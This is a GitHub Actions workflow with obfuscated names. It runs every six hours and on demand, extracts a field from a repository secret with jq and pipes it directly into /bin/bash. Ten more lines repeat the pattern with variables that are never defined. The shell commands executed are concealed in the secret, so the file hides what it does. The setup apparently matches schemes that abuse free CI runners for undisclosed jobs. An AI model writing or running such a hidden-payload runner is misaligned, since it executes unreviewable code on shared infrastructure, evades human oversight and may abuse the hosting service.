name: xiawushucc
on:
  workflow_dispatch:
  schedule:
    - cron: '20 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiawushucc
        env:
          suany5733: ${{ secrets.suany5733 }}
        run: |
          echo $suany5733 | jq -r .rsee2 | /bin/bash
          echo $nh430 | jq -r .nvxp69 | /bin/bash
          echo $urz8525 | jq -r .tebj155 | /bin/bash
          echo $ja1800 | jq -r .wzoe62405 | /bin/bash
          echo $jbe28 | jq -r .f2 | /bin/bash
          echo $k0580 | jq -r .t2949 | /bin/bash
          echo $ihcbq86266 | jq -r .nfn75 | /bin/bash
          echo $me8662 | jq -r .h68 | /bin/bash
          echo $jgz585 | jq -r .dvpsv73 | /bin/bash
          echo $tx22 | jq -r .luw25164 | /bin/bash
          echo $y1403 | jq -r .zv99716 | /bin/bash

